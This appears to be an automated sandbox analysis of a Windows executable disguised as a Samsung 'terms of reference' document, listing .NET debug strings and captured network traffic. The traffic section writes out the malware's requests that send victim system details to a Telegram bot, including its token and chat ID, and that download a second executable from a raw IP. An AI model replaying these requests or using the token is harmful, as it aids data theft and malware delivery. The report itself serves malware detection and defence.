Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdbhP source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160623783.0000029808800000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3158687208.0000025771EE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167883026.000002980C490000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167851335.000002980C481000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165863155.000002980BB21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166308984.000002980BD10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdb source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159195195.0000025773911000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49726 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:59790 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:59791 -> 149.154.167.220:443
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.5:60779 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 192.168.2.5:59545 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected: GET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1
    Host: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
    Host: api.telegram.org
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 138
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1
    Host: ip-api.com
Source: global traffic | HTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1
    Host: 89.23.97.214
